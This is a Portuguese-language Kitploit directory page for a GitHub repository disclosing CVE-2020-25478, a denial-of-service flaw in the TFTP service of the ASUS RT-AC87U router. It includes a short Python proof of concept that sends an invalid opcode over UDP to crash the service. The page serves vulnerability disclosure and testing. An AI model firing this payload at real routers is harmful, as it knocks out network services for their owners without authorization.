Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP é vulnerável a ataque de Negação de Serviço (DoS) | Kitploit
Ferramentas/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
Análise de VulnerabilidadesExploraçãoFuzzingSegurança de Hardware e IoT
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP é vulnerável a ataque de Negação de Serviço (DoS)

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
há 3 anosAinda não revisado

ASUS-RT-AC87U-TFTP-é-vulnerável-a-ataque-de-Negação-de-Serviço-DoS

CVE-2020-25478 - ASUS RT-AC87U TFTP é vulnerável a ataques de Negação de Serviço (DoS)

  1. NOME DO(S) PRODUTO(S) AFETADO(S) E VERSÃO(ÕES)

ASUS RT-AC87U 3.0.0.4.382_51640

  1. TIPO DE PROBLEMA

Está principalmente relacionado à CWE-20: o serviço TFTP em execução no ASUS RT-AC87U é vulnerável a ataques de Negação de Serviço (DoS) quando um opcode inválido é enviado ao serviço. O seguinte trecho de código Python é usado para testar a vulnerabilidade:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. DESCRIÇÃO

O Asus RT-AC87U versão 3.0.0.4.382_51640 é vulnerável a ataques de negação de serviço no serviço TFTP, fazendo com que o serviço TFTP trave. O serviço TFTP está sujeito a travar remotamente quando um opcode inválido é enviado.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

Baixar ferramenta